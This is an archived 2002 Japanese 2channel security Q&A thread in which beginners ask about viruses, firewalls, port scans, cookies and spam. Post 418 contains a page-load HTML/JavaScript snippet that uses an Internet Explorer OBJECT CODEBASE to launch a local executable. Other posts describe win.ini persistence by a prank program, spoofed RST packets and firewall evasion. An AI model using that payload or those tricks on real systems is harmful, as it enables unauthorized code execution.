396 :名無しさん@お腹いっぱい。:02/01/24 09:40
なんかWeb制作板みたいw

ログファイルのパーミッションが666とか606とかじゃないといけないサーバは個人的には嫌だなぁ。


397 :383:02/01/24 10:44
ありがとうございます>>385
さっそく実践します

398 :初心者:02/01/24 12:39
ワード使ってたら、勝手にページがすごいスピードで進んでいきました。
どういうウイルスなんですか?
教えてください。

399 :名無しさん@お腹いっぱい。:02/01/24 12:42
>>398
そんなウイルスなんてないと思われ
マウスがぶっこわれてるんだろ?

ウイルスチェックもせずに聞くのはやめれ

400 :398:02/01/24 12:47
>>399
ご指導ありがとうございました。


401 :名無しさん@お腹いっぱい。:02/01/24 13:50
Meなんですけど、数分間何もしないでPCを置いておくと
HDがガリガリ騒ぎ出します。
再起動しないと止まらないんですが、これはOSのせいなんでしょうか?
それともウイルスなんでしょうか?

402 :名無しさん@お腹いっぱい。:02/01/24 13:51
>>401
マルチ

403 :401:02/01/24 13:52
>>402

マルチって言うウイルスなんですか?

404 :名無しさん@お腹いっぱい。:02/01/24 13:57
>>403
マルチポスト=多重投稿
やってはいけない行為

405 :ど素人:02/01/24 14:00
netstatの出力結果が理解できません。どこか詳細に解説してある所ないでしょうか?

406 :名無しさん@お腹いっぱい。:02/01/24 14:01
>>405
あるよ 検索すれば?

407 :401:02/01/24 14:07
>>404
あぁ多重投稿のことでしたか。Win板の方でもハッキリした答えが聞けなくてつい・・・
すいません。
何も破壊活動がないということはOSのせいと言う事で諦めるしかないんでしょうか?
でも、このままほっといてもHDの寿命を縮めそうで・・・
誰か助けてください。

408 :ど素人:02/01/24 14:36
あきらめてnetstat.cを読みます。レスありがとうございました>406

409 :名無しさん@お腹いっぱい。:02/01/24 14:40
>>407
ネットやディスクへのアクセスを早くすると称する
アプリケーションにはそういう邪魔なことをするのがある。
最近そんなの入れないから知らないが、凄速とか
MS find fast(officeと一緒にインストールされる)
がそうだった。そういうのが入ってるならアンインストール。


410 :名無しさん@お腹いっぱい。:02/01/24 14:45
インデックスサービスとかもCPUのアイドル中にカリカリやるのがウザいなぁ。
あんなサービスいらないし。

411 :401:02/01/24 14:47
>>409
Find fastありました。やってみます。
みなさんレスありがとうございます。

412 :名無しさん@お腹いっぱい。:02/01/24 17:45
すんません。
いい串ありませんかね。

413 :名無しさん@お腹いっぱい。:02/01/24 17:50
クッキーで個人の特定ができますか?
クッキーの名前って、ユーザ名@XXXX.comみたいになってますが
ユーザ名はサーバーの方では読めるんですか?
だれかおせーて。


414 :名無しさん@お腹いっぱい。:02/01/24 17:57
スレッド立てると、IP抜かれるんですか

415 :名無しさん@お腹いっぱい。:02/01/24 18:35
よくアングラサイト行く時には串させ!とかききますけどやっぱ
生だと危険ですか?またどんな危険がありますか。


416 :名無しさん@お腹いっぱい。:02/01/24 18:57
>>415
簡単にいけるUGサイトはへぼ管理人ばっかりだからだいじょうぶ
つーかアングラじゃない厨房サイトの方がむちゃするやつ多いので注意!

417 :名無しさん@お腹いっぱい。:02/01/24 19:41
>>412
自分で探してね

>>413
個人の特定ってどのへんまでってこと?
メールアドレスを入れたのならメールアドレスまで相手にわかる

>>414
書き込むだけでIPアドレスは運営側に知られてるだろうよ

418 :名無しさん@お腹いっぱい。:02/01/24 21:40
<head>
<script>
function run()
{
window.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/calc.exe"></OBJECT>';
}
</script>
</head>
<body onload="run()">
</body>
でcalcが起動できますが、引数を渡すにはどうすればいいのでしょう?


419 :unsubscribe1@checkhouston.net :02/01/24 23:04
Received: from 24-148-67-115.na.21stcentury.net(24.148.67.115) by
smtp-gw.biglobe.ne.jp with SMTP;***+0900(JST)
From:"Ideas4u"< ideas4u001@checkhouston.net >
Date:**
To: musashi@mba.sphere.ne.jp
Subject:500 IDEAS to start your own Internet business
Message-ID:*
--
Do you want to put the power of the Internet to work for you,
but can't come up with that one profitable idea?
We're offering a first ever list of 500 new and innovative ideas
that you can instantly download
http://store.yahoo.com/ideas4u-store/index.html
-----
You received this e-mail because we are on a mutual safelist.
To REMOVE yourself from this list please follow the instructions
at the end of this email or send a blank email to
this list( unsubscribe1@checkhouston.net ) using the word "unsubscribe" as a header.

mail1.21stcentury.net (pri=0)
<220 mail1.21stcentury.net ESMTP
>HELO rlytest.nanet.co.jp
<250 mail1.21stcentury.net
>MAIL FROM:< http://www.nanet.co.jp/rlytest/requestedfrom@mail1.21stcentury.net >
<250 ok
>RCPT TO:<rlytest@nanet.co.jp>
<553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)
正常:中継は拒否されました。
--
checkhouston.net
sitemail.everyone.net (pri=0)
<220 imta03.mta.everyone.net ESMTP Postfix
>HELO rlytest.nanet.co.jp
<250 imta03.mta.everyone.net
>MAIL FROM:< http://www.nanet.co.jp/rlytest/requestedfrom@sitemail.everyone.net >
<250 Ok
>RCPT TO:<rlytest@nanet.co.jp>
<554 <rlytest@nanet.co.jp>: Recipient address rejected: Relay access denied (MTA:imta03)
正常:中継は拒否されました。

420 :名無しさん@お腹いっぱい。:02/01/25 00:20
http://tools.bb.yahoo.co.jp/setup/adsl/security/2k.html
コレを実行したいんですが、自分の環境だと04.gif(1番下)の画像の
2番の赤線で囲まれた項目が表示されません。
どういった理由が考えられますか?
OSはWindows2000sp2です。

421 :名無しさん@お腹いっぱい。:02/01/25 00:23
>>420
ブラウザが壊れてる

422 :420:02/01/25 00:28
>>421
IEのVer書き忘れてしまいました。
現在5.01SP2です。
入れ直しついでに、5.5に上げてみます。
有難うございました。

423 :ひよこ名無しさん:02/01/25 00:36
拡張子がJPGなのにブラクラって、どーしてなの?
JPGって画像ファイルじゃないんですか?

424 :名無しさん@お腹いっぱい。:02/01/25 00:36
>>423
偽装だ
雪印といっしょだ

425 :名無しさん@お腹いっぱい。:02/01/25 00:39
>>423
「必ずしもそうでは無い」と考えている人たちがブラウザを作っているから。


426 :382    :02/01/25 00:44
答えてくださった皆さん>ありがとうございました。勉強になります。

427 : :02/01/25 07:11
 

428 :初心者:02/01/25 09:45
文字化けをしたメールが届いたので開いたらそれからPCがおかしくなりました。
インターネット接続しているとすぐに
>このプログラムは不正な処理を行ったので強制終了されます。
のメッセージが入りシャットダウンしてしまいます。

解決方法はありますか?


429 :名無しさん@お腹いっぱい。:02/01/25 10:25
>>428
なんのソフトを使っているかしらんが再インストールしてみな

430 :初心者:02/01/25 10:33
>>429
今までのデータは消えないんでしょうか?

431 :名無しさん@お腹いっぱい。:02/01/25 10:35
>>429
だから何のソフト使ってるんだよ!
言いたくないなら勝手にしな


432 :初心者:02/01/25 10:42
>>431
Microsoft Outolook98だよ



433 :名無しさん@お腹いっぱい。:02/01/25 11:29
Outolook ってなんじゃゴルァ!!
と言いたいところだが、グーグッてみると意外と見つかる。
そうか Outolook なのか...

434 :名無しさん@お腹いっぱい。:02/01/25 13:49
パソコンで、いつ、どんな操作が行われたか、どのソフトが使われたか
わかるようにするソフトってありますか?
わかりやすく言うと、IEの履歴みたいな感じで・・・。
誰かが、何か変なことしていないか心配なのです。
万が一、自分のIDとパスで、あらしでもされたら、自分の責任ですからね。


435 :健太郎@ろりこん136779786:02/01/25 13:56
ハッキング」から「夜のおかず」までを手広くカバーする巨大掲示板群です。。。
気兼ねなく、会社、学校、座敷牢からアクセスできるように、発信元は一切分かりません。
お気楽ご気楽に書き込んで下さい。

 
2ちゃんねる誰がやってるの? △ ▽  ▲ ▼

永遠の19歳、うまい棒が大好物のヒッキー、ひろゆきが個人で運営してます。。。

 
2ちゃんねるはアングラなの? △ ▽  ▲ ▼

誰もが自由に書き込みが出来る匿名掲示板のシステムには、
アンダーグラウンド(UG アングラ)のイメージが付きまといますが、
運営者としてはそういうスタンスではありません。

すべては利用する皆さんの良識にかかっています。。。よろしくです( ̄ー ̄) ニヤリッ

 
2ちゃんねるは本当に匿名なの? △ ▽  ▲ ▼



436 :名無しさん@お腹いっぱい。:02/01/25 14:00
>>434
あると思うよ
OS不明だからこれ以上言えないが

437 :健太郎@ろりこん136779786:02/01/25 14:42
Hi,what's up?
How do you think about [2channelers]?
Don't you think that they are silly and childish race?
I do think!They're great crazy people, aren't they?!
BTW,I thought that no-one can understand my English BBs.how do you think?
At YAHOO BBs.,2channelers are stues?!Hum?Besides they aren't understand
they
are too stue!I'll never be able to find people like them!I want governments
to amend laws to put stues in prison!Also I want politician to be able to
read this!
If you wanna criticize me,you gotta graduate from Jr.school though!
Viva creasiest 2channelers!

はやくかけよ!連続投稿できねんですから

438 :434:02/01/25 14:43
>>436
OSはウィンドウズ98です。


439 :excite翻訳:02/01/25 15:12
今日は、どう?どのように[2channelers]に関して考えますか。
彼らが愚かで幼稚なレースであると思いませんか。Iは行います、
偉大な正気でない人々をthink!They'reする、それらでない?!BTW(I)は、
誰も私の英語のBBs.howを理解することができないと考えました、
考えますか。YAHOO BBで。2channelersはstuesです?!それらがそうでない
Hum?Besidesは、それらがまたstue!I'llであると理解します、
them!Iのような人々が、政府が、Iが、政治家がそうであることを望む
prison!Alsoにstuesを入れる法則を修正することを望むことを知ることが
できないこと、これを読むのに有能!場合、あなた、wanna、私を批評する、
あなた、gotta、ジュニア学校を卒業する、が!万歳の叫びの最もしわくちゃの
2channelers!

440 :たまご:02/01/25 15:16
来てください!
http://www.i-chubu.ne.jp/~hyamada/

441 :名無しさん@お腹いっぱい。:02/01/25 15:42
outlookexpressですが、
メ−ルの取りこみができなくなりました。
また画面の右下に黄色い三角じるしに!の
ようなエラ−マ−クが見えています。
どういうことでしょう?


442 :名無しさん@お腹いっぱい。:02/01/25 15:44
>>441
サーバが混んでるんじゃないのか?
あるいはメンテナンス中とか

443 :名無しさん@お腹いっぱい。:02/01/25 15:50
>>441
黄色い三角じるしをダブルクリック

444 :名無しさん@お腹いっぱい。:02/01/25 18:08
パソコンを起動するたびに画面いっぱいに知らない女の人の顔が出てきて
「悪ものは逮捕しちゃうぞ!」とか言われて困ってます。
ハードディスクをフォーマットしてWindowsを入れ直してもダメで
どうしてもこの女の人が出るんです。恐いです。助けてください。

ちなみに僕は逮捕されるような悪いことはした覚えはありません。

445 :名無しさん@お腹いっぱい。:02/01/25 18:14
>>444
こっちで聞いてみそ
http://caramel.2.net/test/read.cgi/owarai/1010590222/

446 :名無しさん@お腹いっぱい。:02/01/25 18:22
win2kで
sp2入れてないことのヤバさを
何かにたとえて教えてください。。

447 :名無しさん@お腹いっぱい。:02/01/25 18:25
PW複数使うと

安全性は
アップするのでしょうか?

448 :名無しさん@お腹いっぱい。:02/01/25 18:27
>>447
たぶんトラフィックがアップアップすると思います。

449 :名無しさん@お腹いっぱい。:02/01/25 18:36
1個だとスピードアップくらいじゃないか?
5個ぐらいでバリアになると思うが。

450 :名無しさん@お腹いっぱい。:02/01/25 18:36
昔はフセイアクセス禁止法があり


下克上だったのですか?

451 :名無しさん@お腹いっぱい。:02/01/25 18:37
>>450
昔はフセイアクセス禁止法がなく


下克上だったのですか?



452 :親切な人:02/01/25 18:42

ヤフーオークションで、幻の人気商品、発見!!!

今は無き「コピーガードキャンセラー」↓
http://page5.auctions.yahoo.co.jp/jp/auction/e5843828

ヤフーオークション内では、現在、このオークション
の話題で、持ちきりです。

453 :名無しさん@お腹いっぱい。:02/01/25 19:30
会社のfirewallのアクセス制限を突破して好きなペイジを閲覧するには
どうすればよいのでしょう?

アノニマイザーはもちろんダメだったので、
いまのところエキサイトの翻訳ページ経由で見るくらいしか手がありません。
ただしテキストしか見れないけど。

つうか、別に怪しくもエロくもないペイジにも制限がかかってるのはナゼ?

454 :名無しさん@お腹いっぱい。:02/01/25 20:11
>>453
怪しくもエロくもないペイジと怪しかったりエロかったりするペイジの区別を
自動的に行うことが出来ないから。

455 :名無しさん@お腹いっぱい。:02/01/25 22:28
>>453
ダメ社員を正すためだろ
会社は仕事するとこだ サラリーマンは老後のためにせっせと働け

456 :名無しさん@お腹いっぱい。:02/01/25 22:39
HPにイタズラ?(違うところにリンクされてる)とかって
どうやるんですか?

457 :名無しさん@お腹いっぱい。:02/01/25 22:42
>>456
迷惑なのでそんなことは考えないで下さい
犯罪になります

458 :名無しさん@お腹いっぱい。:02/01/25 22:43
でもかんがえたくなりますよね!!

459 :名無しさん@お腹いっぱい。:02/01/25 22:45
すみません
やっぱかんがえないようにします

460 ::02/01/25 22:48
えらい弱腰やな

461 :名無しさん@お腹いっぱい。:02/01/25 22:48
2chでだめなら
どう言うところで勉強したらいいんですか?


462 :名無しさん@お腹いっぱい。:02/01/25 22:50
>>461
何の勉強?
数学なら大学でいいだろ?

463 :461:02/01/25 22:55
い・た・ず・ら(ハート

464 :名無しさん@お腹いっぱい。:02/01/25 22:58
>>463
いたずらの勉強なんて聞いた事ないので勝手に自分でやれ
あと小学生だったらもう寝ろ

465 :名無しさん@お腹いっぱい。:02/01/25 23:04
ツイスターが終わってしまったので寝ます


466 :名無しさん@お腹いっぱい。:02/01/25 23:05
でもナイトスクープを見たいから起きてます

467 :名無しさん@お腹いっぱい。:02/01/25 23:30
こわくてみてらんない

468 :王蟲:02/01/25 23:32
ハッカーにやられた形跡があるんですが・・・
systemファイルに意味不明なファイルが1000個以上あるんです
そのファイルを削除しようとしたんですが
systemファイルを開こうとするとフリーズしてしまいます
どうやって削除できますか?
教えてください

469 :名無しさん@お腹いっぱい。:02/01/25 23:33
トラブルがあって、トラブル相手にメアドを知られてしまったんですが、
メアドから個人情報漏れることってありますか?
初心者ですみません。マジでびびってるのでよろしくおねがいします。

470 :名無しさん@お腹いっぱい。:02/01/25 23:43
>>468
OS再インストール
systemファイルは無闇にいじるな

>>469
相手がPCに詳しくなければ簡単には漏れないから安心しろ
トラブりそうな相手には匿名のフリーメアドを教える
プロバのメアドは使うな

471 :にょ:02/01/25 23:48
板が違っている様な気もしなくもないのですが、
どこへ質問すれば良いのか判らないので、此方でさせて頂きます。

先日、ISDNからADSLへと(フレッツ)変更した際、セキュリティが
心配になり、ノートンのインターネットセキュリティ2002を導入
したところ、特定のHPスペースに入ってるサイトのカウンターが
見えなくなり、また、特定の掲示板への書き込みができなくなりました。
説明書のトラブルシューティングに従って、一時的に監視を無効にした
ところ、問題が起こらないことが確認できたので、ソフトが原因で
あることは間違いない様です。
設定方法も説明書に書いてあることはあるのですが、いまいち内容が
理解しきれません。
どなたか、対処方法、もしくは対処方法がわかりやすく紹介されている
サイトを教えていただけませんでしょうか?
よろしくお願いいたします。

この板にも、切ってないと書き込めません(泣)

472 :名無しさん@お腹いっぱい。:02/01/25 23:55
ノー豚入れたら…のスレって、
なんでこういう人には見つけられないんだろう?

473 :名無しさん@お腹いっぱい。:02/01/25 23:57
>>470
お返事ありがとうございます。
相手がときメモマニアなので、PCにも詳しいような気がしないでも
ないんですが、個人情報ってそう簡単に漏れるわけでもなさそう
なんですね。一応プロバは朝日ネットなんですけど。
でもウイルス送りつけられたら恐いからとりあえずアドレス
変えようっと。
あとリスク伴いそうな取引の時はhotmailを使うことにします。
早速加入しました。

ありがとうございました。

474 :にょ:02/01/25 23:58
ノー豚……
あ・・・ある(焦)
ごめんなさい、眼悪いくせにフォント小さくしてました(馬鹿
逝ってきます
ありがとうございました

475 :名無しさん@お腹いっぱい。:02/01/26 00:11
>>471
geoシティーズか?
リファきってるから見れないんだよ。
持ってないので設定のばしょはシラソ。

ひまだからまじめに解凍終了

476 :名無しさん@お腹いっぱい。:02/01/26 00:12
メンバーIDとかパスワードとかが載っているサイトってあるものなの?
尻有とかならよくみるけど。

477 :名無しさんです:02/01/26 00:14
今日あるサイトでカスタムクリックのバナーが
ノートンファイアーウォールに ひっかかった。
アウトバウンドで。何送信しようと してるのでしょう?

478 :477:02/01/26 00:23
あ、ちなみにeb板で返事がなかったのでここに来ました。
よろしくです。

479 :名無しさん@お腹いっぱい。:02/01/26 00:29
>>476
海外によくある もちろん犯罪

>>477
ノートンのログ見れ
どうせクッキーかなにかでしょう

480 :名無しさん@お腹いっぱい。:02/01/26 00:41
ウィルス対策ソフトって正直な所、必要なんですか??

481 :にょ:02/01/26 03:34
板が違っている様な気もしなくもないのですが、
どこへ質問すれば良いのか判らないので、此方でさせて頂きます。

先日、ある友人から聞かれたのですが、なんでも友人の会社に
縁故入社できたやつが、社内のPCを勝手にRANを組んだ上、
突然、行方不明になったらしいんです。
おまけに、そいつが勝手に自分を管理者にして、PCの全データを
自分にしか見れないようにしたらしいんです。友人も含め、他の人は許可
された1部分しか見れないらしいんです。
どなたか、対処方法、もしくは対処方法がわかりやすく紹介されている
サイトを教えていただけませんでしょうか?
よろしくお願いいたします。


482 :名無しさん@お腹いっぱい。:02/01/26 05:27
>>480
必要 winユーザならなおさら

>>481
捜索願いなら警察へ
OSも書かずに質問はよせ
社内PCに勝手にLANを組まれるその会社のセキュリティがやばい

483 :鈴木心如斎:02/01/26 05:27
篠原涼子さんは真性の篠原涼子さんなのか?!


484 :鈴木心如斎:02/01/26 05:29
電波!電波!ネオナチ電波!漂う!受信するな!洗脳される!
ネオナチ!プロパガンダでラジオ多用から前進なし!
電波!電波!電波!電波!

485 :名無しさん@お腹いっぱい。:02/01/26 05:30
>481
金庫破りと同じ。
素人に簡単に破られるようだったら、金庫の意味がない。

486 :名無しさん@お腹いっぱい。:02/01/26 06:23
これって何ですか?
今ファイアウォール(TPF)に引っかかったんですけど。

Outgoing Connection Alert!
'MDIBrowser' from your computer wants to connect to
j076155.ppp.asahi-net.or.jp[61.213.76.155],port18201
でポートが18201〜18205まで。

ここで61.213.76.155を調べたら↓のような結果でした。
誰か分かる人いますか?

487 :名無しさん@お腹いっぱい。:02/01/26 06:23
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information:
a. [Network Number] 61.213.64.0-61.213.127.0
b. [Network Name] ASAHI-NET
g. [Organization]   Asahi Net
m. [Administrative Contact] AT009JP
n. [Technical Contact]  AT009JP
p. [Nameserver]  crusader.asahi-net.or.jp
p. [Nameserver]   falcon.asahi-net.or.jp
y. [Reply Mail]  domain@gate.asahi-net.or.jp
[Assigned Date] 2001/07/03
[Return Date]
[Last Update] 2001/07/03 15:03:08 (JST)
ip-alloc@nic.ad.jp



488 :名無しさん@お腹いっぱい。:02/01/26 06:24
>>486
ポートスキャンだろ?

489 :486:02/01/26 06:24
>>486のここは
http://www.personalfirewalljapan.com/explanation/attack.htm
です。
スマソ

490 :486:02/01/26 06:29
>>488
ポートスキャンですか。
asahi-net使ってないんで、何だろうって思ったんです。

491 :名無しの権兵衛:02/01/26 06:52
あの〜IPアドレスが分かると何か出来ますか?例えでいいのですが。。。

492 :名無しさん@お腹いっぱい。:02/01/26 06:53
いろんな所にカキコされてて、怖いってかいてあるんだけど
これは、何なのですか?ウイルス?

http://myhome.hananet.net/~crazyghost/goto.htm


493 :↑直リンしないでね:02/01/26 06:58
>>491
穴が開いてたら入れる。

494 :名無しの権兵衛:02/01/26 06:58
↑鬼婆のドアップでたよ(泣)

495 :名無しの権兵衛:02/01/26 07:00
穴?入れる?穴とはセキユリティポートとかの事?
でもって入ってどうすんの?教えて教えて!

496 :名無しさん@お腹いっぱい。:02/01/26 07:22
セキュリティーホールだな(w
入れたら、何でもし放題だけど、
知らない人のPCの中身なんて見ても面白くないし、
結局イタズラするやつが多いけど
下手にいじると器物破損になるからな。

497 :初心者厨房:02/01/26 07:41
やばいです。htmlメールが来たんだけど、何を考えたのか開いてしまいました。
件名が「Im going to disney land! 16531」(Imにアポストロフィー無し)
で、添付ファイルは無し。本文もありませんでした。
でもメッセージのソース見たら、htmlにjavaスクリプトが…!
ノートンでチェックしたけど、最新定義にもひっかかりませんでした。
新種でしょうか?感染したのでしょうか?

498 :名無しさん@お腹いっぱい。:02/01/26 07:44
ディスニーランドに一緒に逝ってあげればよろしんではないかと…

499 :初心者厨房:02/01/26 07:46
IPAに逝って来ます

500 :ど素人:02/01/26 10:10
>>497
気になるので、ヘッダ見せて

501 :名無しさん@お腹いっぱい。:02/01/26 10:22
2chでホットメールのアドレス書いたら
トロイ埋め込まれるんでしょうか?

502 :初心者厨房:02/01/26 11:00
ヘッダのメアドに、○○○@hackphreak.orgってのがある。
ハック…フリーク…ぎゃー!!!


503 :トロイ:02/01/26 11:11
Trojan.Win32.Viseの駆除方法はありますか?

504 : :02/01/26 11:16
みなさん、こんばんは。
もう、ある程度の靴が揃ったので、買う必要はないのですが、今日のように疲れた翌日などストレスがたまると、何となく買いたくなります・・・。
日本では、欲しい靴はないのですが、靴散策をしていい靴があったら、・・・。
とはいっても、理性はあるので、ヨーロッパにない靴しか選択肢はありません。
となると、アメリカンな靴で買い得感のあるアレンか、メイド・イン・ジャパンの靴の何かでしょうか。
本当に買う確率はほとんどないのですが、このように、何か買おうかなと考えるのも楽しいものです。
実は、先週見た、アレンのU−チップが気になっています。
ダークバーガンディーのコードバンは、グレインレザーしかないので、アレンで揃えるのもいいかなぁって・・・。
まぁ、このデフレでは、無駄な消費は控えるべきなので、冷静になれるように、靴ショップには今日は行きません。
でも、明日は・・・(意味深)。


505 :名無しさん@お腹いっぱい。:02/01/26 11:51
>>501


506 :名無しさん@お腹いっぱい。:02/01/26 12:20
バッドトランスウィルスに感染した人からメールをもらったら、
別のウィルスに変換されるなんて事あるのでしょうか?

507 :名無しさん@お腹いっぱい。:02/01/26 13:10
>>486
>>488
英語の勉強しなさい。

508 :名無しさん@お腹いっぱい。:02/01/26 14:50
>>501
そんなことはないがここでメールアドレスを書かない方がいい
何送られるか分からんぞ

>>502
んでどうした?

509 :名無しさん@お腹いっぱい。:02/01/26 14:51
>>503
ある

>>506
ないと思われ

510 :トロイ:02/01/26 17:06
>>509
・・・で方法は?


511 :名無しさん@お腹いっぱい。:02/01/26 17:08
>>510
ウイルス対策ソフトを買ってこい
まあ持ってるだろうけどね

感染もしてないのになぜ駆除方法を聞きたがるのか分からん

512 :名無しさん@お腹いっぱい。:02/01/26 17:23
windowsの自動アップデートの通知ありますよね。エロサイト開いたら
突然通知がきて今ごろ12月17日の修正プログラムをDLするように通知が
来たんだけど、もしかしてそこのHP管理者がMSの通知と全く同じモノを
閲覧者にしかけてそこにウィルスなどをしかけているという被害例は今ま
でありましたか?答えが出たあとでDLしたいと思います

513 :名無しさん@お腹いっぱい。:02/01/26 17:26
まず、そのサイトのURLを貼れ。


514 :さわこ:02/01/26 17:33
あのー、みなさんに質問があります。
最小化のボタンが「0」、最大化が「1」、閉じるが「r」・・・
その他にもいろいろ。
これはウィルスに感染したということなのでしょうか?

515 :(゜▼゜*):02/01/26 17:35
>>514
Windows FAQ
http://homepage2.nifty.com/winfaq/wme/trouble.html#74

516 :名無しさん@お腹いっぱい:02/01/26 17:37
初心者です。
Re:メールで有名になったウイルスの名前教えて下さい!

517 :名無しさん@お腹いっぱい。:02/01/26 17:37
ttp://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip
これ踏んだんだけどやばいですかね?。


518 :(゜▼゜*):02/01/26 17:43
>>516
まずココ↓へいきます。
http://www.google.com/
キーワードに"Re:メール ウイルス"とでも入れて検索してください。

519 :516:02/01/26 17:47
>>518
さんくす!

520 :名無しさん@お腹いっぱい。:02/01/26 17:52
>>514
フォントキャッシュが壊れてるんじゃないかと思われ。
フォントの種類がへっていたら、修正プログラムを適用しなされ。
フリーで配布されているはず。

521 :名無しさん@お腹いっぱい。:02/01/26 17:52
>>517
踏んだだけなら単なるzip圧縮ファイル。
中身はたぶん得体のしれない実行ファイル

522 :さわこ:02/01/26 17:53
(゜▼゜*)さん、ありがとうございましたです。
無事、修復できましたです。
とってもありがとうです。

523 :ナディア:02/01/26 18:00
>>517 半角で踏んだな。それやばくない
ソノプログラムは解凍実行すると、デスクトップにmadoka.exeとc:\windows
にozawa.exe&ozawa.logを生成して、親切にもwin.iniに run=ozawa.exe と書き込んでくれます。
多分、517の今の状態は、一定時間ごとに「きゃ〜」と叫び声がして
かわゆい女の子が数秒現れると言う動作を繰り返しているはずです。(笑
ま、それはそれで乙なものなのですが。。。
消し方は・・デスクトップのmadoka.exeを削除。次に
c:\windous\win.iniをメモ帳で開き、run=ozawa.exeの記述を
削除、上書き保存。リブート後、c:\windows\ozawa.exe&ozawa.logを削除。
で、もう一丁リブート。     by ナディア



524 :さわこ:02/01/26 18:02
>>520
ありがとうです。
ちょっと具合がわるくなっても、自分でどこが悪いのかわからない・・・。
おべんきょう、しまっす。

525 :第三者中継可能?:02/01/26 18:03
From:AMERIONE MASTERCARD< cpa@brain2002.com >
To: unsubscribe1@checkhouston.net
Subject:Friend,100% Guaranteed Approval!
Date:**
Received:from[205.244.70.4]by sitemail.everyone.net with ESMTP id **
Received: from lsmail1 (216.242.16.45) by lsmail4.opthome.com (LSMTP for Windows NT v1.1b) with SMTP id < removebrain2002com@lsmail4.opthome.com >
From cpa@BRAIN2002.COM
---
Get your AmeriOne MasterCardョ here. It is 100% Guaranteed Approval. You can receive card limit up to $7500 with,
- O% interest - No Credit Check - No late Charges - No Checking account required
The e-mail subscription address is: unsubscribe1@checkhouston.net
To unsubscribe please click here. or Send an email with remove as the subject to remove@brain2002.com

526 :名無しさん@お腹いっぱい。:02/01/26 18:47
http://pc.2ch.net/test/read.cgi/sec/1010952801/l50

527 :名無しさん@お腹いっぱい。:02/01/26 19:50
CLOSE_WAIT状態のポートを手動で閉じる方法ってあるんでしょうか?
netstatやって見たら30個位CLOSE_WAIT状態のポートがあるんで
こいつらを何とかしたいんです。
OSはWIN98です。

528 :名無しさん@お腹いっぱい。:02/01/26 19:54
RST受信すれば閉じるから、自分向けにIP spoofしたRST送れば閉じるかも知れん。


529 :名無しさん@お腹いっぱい。:02/01/27 15:50
こんにちは
突然すいません、PCがシャットダウン出来なく困ってます・・・
なんか分からないんですが、その権限が無いってPC言われて出来無くなりました。
コンピュータの管理で見てみたらユーザーとグループの所に×印。
イベントビューアー、アプリとシステムの
AM3時〜10時がスッポリ抜けててその後、新たにログ開始になってました・・
気持ち悪いのでアンチウィルスチェック使用としたら
無効になってて再インストールを求められました。
その間、私はPCに触れていなかったんですが
MXをサーバーから切って起動してました。
まじ、ブルッてます。なんででしょう?侵入されたんでしょうか?
教えてください。
Win2000 ZoneAlarm NortonAntiVirus2002使ってます。

530 :名無し:02/01/27 16:01
ウイルスバスター2002がPingAttackを検知しました。
ドメインサーチしたら、どうやら中国からの様です。
Googleで検索してもいまいち判りません。

簡単に説明して頂けませんか?

531 :名無しさん@お腹いっぱい。:02/01/27 16:04
bv

532 :名無しさん@お腹いっぱい。:02/01/27 16:09
・・・何を検索したいんですか?

533 :yaya:02/01/27 16:12
madokaというもので苦労しました。ウィルス対策は必要だなと思い、最初からパソコンに入っていた、VirusScanというものをやってみました。スキャンをすると、不正な処理うんぬんかんぬんとなり、実行できません。なぜでしょうか?

534 :530:02/01/27 16:15
PingAttackをされると、どんな実害がでるのか
教えて頂きたいです。

なんか最近OS(WinMe)がガタガタなんです。

535 :名無しさん@お腹いっぱい。:02/01/27 17:07
>>534
無害

ガタガタなのは他に原因があります。

536 :名無しさん@お腹いっぱい。:02/01/27 17:27
>>534
うけたくなかったらICMPをDISABLEにしておくんなせえ


537 :530:02/01/27 17:37
>>535>>536

サソクス 安心しました

538 :名無しさん@お腹いっぱい。:02/01/27 17:41
初心者がサンクスとか言うなよ。ヴォケが。>>537

539 :名無しさん@お腹いっぱい。:02/01/27 17:44
>>538
なん〜でだ??

540 :名無しさん@お腹いっぱい。:02/01/27 18:29
>>538 によると、
初心者は言語上の制約も受けなければいけないらしい。


541 :名無しさん@お腹いっぱい。:02/01/27 18:32
>>538の腐った頭によれば
初心者は感謝の言葉を述べるとき
「ヨンクス」と言わなければならないようだ。


542 :名無しさん@お腹いっぱい。:02/01/27 18:39
Beginnerという英単語にそのような訳があるからなのかどうかは知らないが、>>1-541のような
自称「初心者」は困ったものだ。Beginnerという単語は単に「何かを初めて行い始めたばかりの人」という
意味しか無いと思っている。

日本語における「初心」の真意は何だろうか。
世流能楽の大成者・世阿弥は「初心忘るべからず」という諺を残したが、この諺にこそ「初心」の
真意が込められていると思う。

この「初心」には”何かを初めて行い始めた”という状態を指す意味も勿論含まれているが、
”初めてだからこそ、より上を目指して人並み以上に自己努力・自己研鑚する心意気”という意味も
多分に含められているはずだ。だからこそ「初心忘るべからず」という諺が成立するのである。

>>1のようにBeginnerであるにも拘わらず、少しでも分からないことがあればすぐ人に聞くような
態度を見せる人は、「初心を持つ人」たる「初心者」と自ら名乗るには到底値しない人なのである。
例えば>>1のような人が「初心忘るべからず」という態度を取リ続けたらどうだろう。
本人は遅々として成長せず、周囲にだけは多大な迷惑がかかるはずだ。そのような人間には
「初心者」を名乗る資格はない。「ビギナー」「無為(むい)者」等と名乗るべきである。  


543 :初心者:02/01/27 18:42
>>542
で?

544 : :02/01/27 22:47


545 :名無しさん@お腹いっぱい。:02/01/27 22:54
例のヒカルが気になってトレンドのオンラインスキャンして
みたのですが、使用OSがMEなのに枠に書かれている
「−トロイの木馬の検索について Windows 95/98/Meをお使いの場合、
ウイルス検索を開始しますと、MS-DOSプロンプトの画面(右画像参照)が
起動します」
のように、MS-DOSプロンプトの画面が出ないのですが、
既にトロイに「発見させないよ〜」ってな感じで検知できないように
何かされているのでしょうか?


546 :名無しさん@お腹いっぱい。:02/01/27 23:00
>>542
どうでもいいが、そのコピペ、ここの現状に合ってないな。
だいたいここの>>1ってこれ、Part6のスレだし。
高ぁ〜いところからの視点で見て書いてるつもりかもしれんけど、
全然モノが見えてないし…。

547 :名無しさん@お腹いっぱい。:02/01/27 23:01
